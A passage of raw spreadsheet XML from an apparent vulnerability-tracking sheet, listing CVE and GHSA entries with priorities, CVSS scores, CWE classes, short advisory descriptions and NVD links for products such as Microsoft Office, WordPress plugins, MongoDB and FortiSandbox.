Medium</t></is></c><c r="B1213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1213" s="5" t="inlineStr"><is><t>CVE-2026-69477</t></is></c><c r="D1213" s="5" t="n"><v>7.3</v></c><c r="E1213" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1213" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1213" s="5" t="inlineStr" /><c r="H1213" s="5" t="n"><v>0.004</v></c><c r="I1213" s="5" t="inlineStr" /><c r="J1213" s="5" t="inlineStr" /><c r="K1213" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1213" s="5" t="inlineStr" /><c r="M1213" s="5" t="inlineStr" /><c r="N1213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1213" s="5" t="inlineStr" /><c r="Q1213" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1213" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t></is></c><c r="S1213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t></is></c></row><row r="1214"><c r="A1214" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1214" s="5" t="inlineStr"><is><t>CVE-2026-78627</t></is></c><c r="D1214" s="5" t="n"><v>7.3</v></c><c r="E1214" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1214" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1214" s="5" t="inlineStr" /><c r="H1214" s="5" t="n"><v>0.001</v></c><c r="I1214" s="5" t="inlineStr" /><c r="J1214" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1214" s="5" t="inlineStr" /><c r="L1214" s="5" t="inlineStr" /><c r="M1214" s="5" t="inlineStr" /><c r="N1214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1214" s="5" t="inlineStr" /><c r="Q1214" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R1214" s="5" t="inlineStr"><is><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is></c><c r="S1214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t></is></c></row><row r="1215"><c r="A1215" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1215" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1215" s="5" t="inlineStr"><is><t>CVE-2026-85028</t></is></c><c r="D1215" s="5" t="n"><v>7.3</v></c><c r="E1215" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1215" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1215" s="5" t="inlineStr" /><c r="H1215" s="5" t="n"><v>0.001</v></c><c r="I1215" s="5" t="inlineStr" /><c r="J1215" s="5" t="inlineStr" /><c r="K1215" s="5" t="inlineStr" /><c r="L1215" s="5" t="inlineStr" /><c r="M1215" s="5" t="inlineStr" /><c r="N1215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1215" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1215" s="5" t="inlineStr" /><c r="Q1215" s="5" t="inlineStr"><is><t>CWE-379</t></is></c><c r="R1215" s="5" t="inlineStr"><is><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is></c><c r="S1215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85028</t></is></c></row><row r="1216"><c r="A1216" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1216" s="5" t="inlineStr"><is><t>CVE-2026-86806</t></is></c><c r="D1216" s="5" t="n"><v>7.3</v></c><c r="E1216" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1216" s="5" t="inlineStr" /><c r="H1216" s="5" t="n"><v>0.005</v></c><c r="I1216" s="5" t="inlineStr" /><c r="J1216" s="5" t="inlineStr" /><c r="K1216" s="5" t="inlineStr" /><c r="L1216" s="5" t="inlineStr" /><c r="M1216" s="5" t="inlineStr" /><c r="N1216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1216" s="5" t="inlineStr" /><c r="Q1216" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1216" s="5" t="inlineStr"><is><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is></c><c r="S1216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t></is></c></row><row r="1217"><c r="A1217" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1217" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1217" s="5" t="inlineStr"><is><t>CVE-2026-15984</t></is></c><c r="D1217" s="5" t="n"><v>7.2</v></c><c r="E1217" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1217" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1217" s="5" t="inlineStr" /><c r="H1217" s="5" t="n"><v>0.002</v></c><c r="I1217" s="5" t="inlineStr" /><c r="J1217" s="5" t="inlineStr" /><c r="K1217" s="5" t="inlineStr" /><c r="L1217" s="5" t="inlineStr" /><c r="M1217" s="5" t="inlineStr" /><c r="N1217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1217" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1217" s="5" t="inlineStr" /><c r="Q1217" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1217" s="5" t="inlineStr"><is><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is></c><c r="S1217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15984</t></is></c></row><row r="1218"><c r="A1218" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1218" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1218" s="5" t="inlineStr"><is><t>CVE-2026-16649</t></is></c><c r="D1218" s="5" t="n"><v>7.2</v></c><c r="E1218" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1218" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1218" s="5" t="inlineStr" /><c r="H1218" s="5" t="n"><v>0.002</v></c><c r="I1218" s="5" t="inlineStr" /><c r="J1218" s="5" t="inlineStr" /><c r="K1218" s="5" t="inlineStr" /><c r="L1218" s="5" t="inlineStr" /><c r="M1218" s="5" t="inlineStr" /><c r="N1218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1218" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1218" s="5" t="inlineStr" /><c r="Q1218" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1218" s="5" t="inlineStr"><is><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is></c><c r="S1218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16649</t></is></c></row><row r="1219"><c r="A1219" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1219" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1219" s="5" t="inlineStr"><is><t>CVE-2026-18406</t></is></c><c r="D1219" s="5" t="n"><v>7.2</v></c><c r="E1219" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1219" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1219" s="5" t="inlineStr" /><c r="H1219" s="5" t="n"><v>0.003</v></c><c r="I1219" s="5" t="inlineStr" /><c r="J1219" s="5" t="inlineStr" /><c r="K1219" s="5" t="inlineStr" /><c r="L1219" s="5" t="inlineStr" /><c r="M1219" s="5" t="inlineStr" /><c r="N1219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1219" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1219" s="5" t="inlineStr" /><c r="Q1219" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1219" s="5" t="inlineStr"><is><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is></c><c r="S1219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18406</t></is></c></row><row r="1220"><c r="A1220" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1220" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1220" s="5" t="inlineStr"><is><t>CVE-2026-19224</t></is></c><c r="D1220" s="5" t="n"><v>7.2</v></c><c r="E1220" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1220" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1220" s="5" t="inlineStr" /><c r="H1220" s="5" t="n"><v>0.004</v></c><c r="I1220" s="5" t="inlineStr" /><c r="J1220" s="5" t="inlineStr" /><c r="K1220" s="5" t="inlineStr" /><c r="L1220" s="5" t="inlineStr" /><c r="M1220" s="5" t="inlineStr" /><c r="N1220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1220" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1220" s="5" t="inlineStr" /><c r="Q1220" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1220" s="5" t="inlineStr"><is><t>The Hummingbird Performance  WordPress plugin before 3.21.2 does not restrict a network-wide setting to network administrators, allowing an administrator of any single site on a multisite network to execute arbitrary code across the entire network.</t></is></c><c r="S1220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19224</t></is></c></row><row r="1221"><c r="A1221" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1221" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1221" s="5" t="inlineStr"><is><t>CVE-2026-19769</t></is></c><c r="D1221" s="5" t="n"><v>7.2</v></c><c r="E1221" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1221" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1221" s="5" t="inlineStr" /><c r="H1221" s="5" t="n"><v>0.002</v></c><c r="I1221" s="5" t="inlineStr" /><c r="J1221" s="5" t="inlineStr" /><c r="K1221" s="5" t="inlineStr" /><c r="L1221" s="5" t="inlineStr" /><c r="M1221" s="5" t="inlineStr" /><c r="N1221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1221" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1221" s="5" t="inlineStr" /><c r="Q1221" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1221" s="5" t="inlineStr"><is><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is></c><c r="S1221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19769</t></is></c></row><row r="1222"><c r="A1222" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1222" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1222" s="5" t="inlineStr"><is><t>CVE-2026-34968</t></is></c><c r="D1222" s="5" t="n"><v>7.2</v></c><c r="E1222" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1222" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1222" s="5" t="inlineStr" /><c r="H1222" s="5" t="n"><v>0.003</v></c><c r="I1222" s="5" t="inlineStr" /><c r="J1222" s="5" t="inlineStr" /><c r="K1222" s="5" t="inlineStr" /><c r="L1222" s="5" t="inlineStr" /><c r="M1222" s="5" t="inlineStr" /><c r="N1222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1222" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1222" s="5" t="inlineStr" /><c r="Q1222" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1222" s="5" t="inlineStr"><is><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is></c><c r="S1222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34968</t></is></c></row><row r="1223"><c r="A1223" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1223" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1223" s="5" t="inlineStr"><is><t>CVE-2026-71506</t></is></c><c r="D1223" s="5" t="n"><v>7.2</v></c><c r="E1223" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1223" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1223" s="5" t="inlineStr" /><c r="H1223" s="5" t="n"><v>0.003</v></c><c r="I1223" s="5" t="inlineStr" /><c r="J1223" s="5" t="inlineStr" /><c r="K1223" s="5" t="inlineStr" /><c r="L1223" s="5" t="inlineStr" /><c r="M1223" s="5" t="inlineStr" /><c r="N1223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1223" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1223" s="5" t="inlineStr" /><c r="Q1223" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1223" s="5" t="inlineStr"><is><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is></c><c r="S1223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71506</t></is></c></row><row r="1224"><c r="A1224" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1224" s="5" t="inlineStr"><is><t>CVE-2026-76561</t></is></c><c r="D1224" s="5" t="n"><v>7.2</v></c><c r="E1224" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1224" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1224" s="5" t="inlineStr" /><c r="H1224" s="5" t="n"><v>0.006</v></c><c r="I1224" s="5" t="inlineStr" /><c r="J1224" s="5" t="inlineStr" /><c r="K1224" s="5" t="inlineStr" /><c r="L1224" s="5" t="inlineStr" /><c r="M1224" s="5" t="inlineStr" /><c r="N1224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1224" s="5" t="inlineStr" /><c r="Q1224" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1224" s="5" t="inlineStr"><is><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is></c><c r="S1224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t></is></c></row><row r="1225"><c r="A1225" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1225" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1225" s="5" t="inlineStr"><is><t>CVE-2026-77233</t></is></c><c r="D1225" s="5" t="n"><v>7.2</v></c><c r="E1225" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1225" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1225" s="5" t="inlineStr" /><c r="H1225" s="5" t="n"><v>0.003</v></c><c r="I1225" s="5" t="inlineStr" /><c r="J1225" s="5" t="inlineStr" /><c r="K1225" s="5" t="inlineStr" /><c r="L1225" s="5" t="inlineStr" /><c r="M1225" s="5" t="inlineStr" /><c r="N1225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1225" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1225" s="5" t="inlineStr" /><c r="Q1225" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1225" s="5" t="inlineStr"><is><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is></c><c r="S1225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77233</t></is></c></row><row r="1226"><c r="A1226" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1226" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1226" s="5" t="inlineStr"><is><t>CVE-2026-77263</t></is></c><c r="D1226" s="5" t="n"><v>7.2</v></c><c r="E1226" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1226" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1226" s="5" t="inlineStr" /><c r="H1226" s="5" t="n"><v>0.002</v></c><c r="I1226" s="5" t="inlineStr" /><c r="J1226" s="5" t="inlineStr" /><c r="K1226" s="5" t="inlineStr" /><c r="L1226" s="5" t="inlineStr" /><c r="M1226" s="5" t="inlineStr" /><c r="N1226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1226" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1226" s="5" t="inlineStr" /><c r="Q1226" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1226" s="5" t="inlineStr"><is><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is></c><c r="S1226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77263</t></is></c></row><row r="1227"><c r="A1227" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1227" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1227" s="5" t="inlineStr"><is><t>CVE-2026-77830</t></is></c><c r="D1227" s="5" t="n"><v>7.2</v></c><c r="E1227" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1227" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1227" s="5" t="inlineStr" /><c r="H1227" s="5" t="n"><v>0.003</v></c><c r="I1227" s="5" t="inlineStr" /><c r="J1227" s="5" t="inlineStr" /><c r="K1227" s="5" t="inlineStr" /><c r="L1227" s="5" t="inlineStr" /><c r="M1227" s="5" t="inlineStr" /><c r="N1227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1227" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1227" s="5" t="inlineStr" /><c r="Q1227" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1227" s="5" t="inlineStr"><is><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is></c><c r="S1227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77830</t></is></c></row><row r="1228"><c r="A1228" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1228" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1228" s="5" t="inlineStr"><is><t>CVE-2026-78438</t></is></c><c r="D1228" s="5" t="n"><v>7.2</v></c><c r="E1228" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1228" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1228" s="5" t="inlineStr" /><c r="H1228" s="5" t="n"><v>0.003</v></c><c r="I1228" s="5" t="inlineStr" /><c r="J1228" s="5" t="inlineStr" /><c r="K1228" s="5" t="inlineStr" /><c r="L1228" s="5" t="inlineStr" /><c r="M1228" s="5" t="inlineStr" /><c r="N1228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1228" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1228" s="5" t="inlineStr" /><c r="Q1228" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1228" s="5" t="inlineStr"><is><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is></c><c r="S1228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78438</t></is></c></row><row r="1229"><c r="A1229" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1229" s="5" t="inlineStr"><is><t>CVE-2026-81349</t></is></c><c r="D1229" s="5" t="n"><v>7.2</v></c><c r="E1229" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1229" s="5" t="inlineStr" /><c r="H1229" s="5" t="n"><v>0.007</v></c><c r="I1229" s="5" t="inlineStr" /><c r="J1229" s="5" t="inlineStr" /><c r="K1229" s="5" t="inlineStr" /><c r="L1229" s="5" t="inlineStr" /><c r="M1229" s="5" t="inlineStr" /><c r="N1229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1229" s="5" t="inlineStr" /><c r="Q1229" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1229" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S1229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t></is></c></row><row r="1230"><c r="A1230" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1230" s="5" t="inlineStr"><is><t>CVE-2026-81806</t></is></c><c r="D1230" s="5" t="n"><v>7.2</v></c><c r="E1230" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1230" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1230" s="5" t="inlineStr" /><c r="H1230" s="5" t="n"><v>0.002</v></c><c r="I1230" s="5" t="inlineStr" /><c r="J1230" s="5" t="inlineStr" /><c r="K1230" s="5" t="inlineStr" /><c r="L1230" s="5" t="inlineStr" /><c r="M1230" s="5" t="inlineStr" /><c r="N1230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1230" s="5" t="inlineStr" /><c r="Q1230" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1230" s="5" t="inlineStr"><is><t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.

This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t></is></c><c r="S1230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t></is></c></row><row r="1231"><c r="A1231" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1231" s="5" t="inlineStr"><is><t>CVE-2026-82061</t></is></c><c r="D1231" s="5" t="n"><v>7.2</v></c><c r="E1231" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1231" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1231" s="5" t="inlineStr" /><c r="H1231" s="5" t="n"><v>0.003</v></c><c r="I1231" s="5" t="inlineStr" /><c r="J1231" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1231" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1231" s="5" t="inlineStr" /><c r="M1231" s="5" t="inlineStr" /><c r="N1231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1231" s="5" t="inlineStr" /><c r="Q1231" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1231" s="5" t="inlineStr"><is><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is></c><c r="S1231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t></is></c></row><row r="1232"><c r="A1232" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1232" s="5" t="inlineStr"><is><t>CVE-2026-82071</t></is></c><c r="D1232" s="5" t="n"><v>7.2</v></c><c r="E1232" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1232" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1232" s="5" t="inlineStr" /><c r="H1232" s="5" t="n"><v>0.003</v></c><c r="I1232" s="5" t="inlineStr" /><c r="J1232" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1232" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1232" s="5" t="inlineStr" /><c r="M1232" s="5" t="inlineStr" /><c r="N1232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1232" s="5" t="inlineStr" /><c r="Q1232" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1232" s="5" t="inlineStr"><is><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is></c><c r="S1232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t></is></c></row><row r="1233"><c r="A1233" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1233" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1233" s="5" t="inlineStr"><is><t>CVE-2026-83595</t></is></c><c r="D1233" s="5" t="n"><v>7.2</v></c><c r="E1233" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1233" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1233" s="5" t="inlineStr" /><c r="H1233" s="5" t="n"><v>0.002</v></c><c r="I1233" s="5" t="inlineStr" /><c r="J1233" s="5" t="inlineStr" /><c r="K1233" s="5" t="inlineStr" /><c r="L1233" s="5" t="inlineStr" /><c r="M1233" s="5" t="inlineStr" /><c r="N1233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1233" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1233" s="5" t="inlineStr" /><c r="Q1233" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R1233" s="5" t="inlineStr"><is><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is></c><c r="S1233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83595</t></is></c></row><row r="1234"><c r="A1234" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1234" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1234" s="5" t="inlineStr"><is><t>CVE-2026-83625</t></is></c><c r="D1234" s="5" t="n"><v>7.2</v></c><c r="E1234" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1234" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1234" s="5" t="inlineStr" /><c r="H1234" s="5" t="n"><v>0.003</v></c><c r="I1234" s="5" t="inlineStr" /><c r="J1234" s="5" t="inlineStr" /><c r="K1234" s="5" t="inlineStr" /><c r="L1234" s="5" t="inlineStr" /><c r="M1234" s="5" t="inlineStr" /><c r="N1234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1234" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1234" s="5" t="inlineStr" /><c r="Q1234" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1234" s="5" t="inlineStr"><is><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is></c><c r="S1234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83625</t></is></c></row><row r="1235"><c r="A1235" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1235" s="5" t="inlineStr"><is><t>CVE-2026-84387</t></is></c><c r="D1235" s="5" t="n"><v>7.2</v></c><c r="E1235" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1235" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1235" s="5" t="inlineStr" /><c r="H1235" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1235" s="5" t="inlineStr" /><c r="J1235" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1235" s="5" t="inlineStr" /><c r="L1235" s="5" t="inlineStr" /><c r="M1235" s="5" t="inlineStr" /><c r="N1235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1235" s="5" t="inlineStr" /><c r="Q1235" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R1235" s="5" t="inlineStr"><is><t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="S1235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t></is></c></row><row r="1236"><c r="A1236" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1236" s="5" t="inlineStr"><is><t>CVE-2026-86733</t></is></c><c r="D1236" s="5" t="n"><v>7.2</v></c><c r="E1236" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1236" s="5" t="inlineStr" /><c r="H1236" s="5" t="n"><v>0.003</v></c><c r="I1236" s="5" t="inlineStr" /><c r="J1236" s="5" t="inlineStr" /><c r="K1236" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1236" s="5" t="inlineStr" /><c r="M1236" s="5" t="inlineStr" /><c r="N1236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1236" s="5" t="inlineStr" /><c r="Q1236" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1236" s="5" t="inlineStr"><is><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is></c><c r="S1236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t></is></c></row><row r="1237"><c r="A1237" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1237" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1237" s="5" t="inlineStr"><is><t>GHSA-7jx3-jqcp-hhgc</t></is></c><c r="D1237" s="5" t="n"><v>7.2</v></c><c r="E1237" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1237" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1237" s="5" t="inlineStr" /><c r="H1237" s="5" t="inlineStr" /><c r="I1237" s="5" t="inlineStr" /><c r="J1237" s="5" 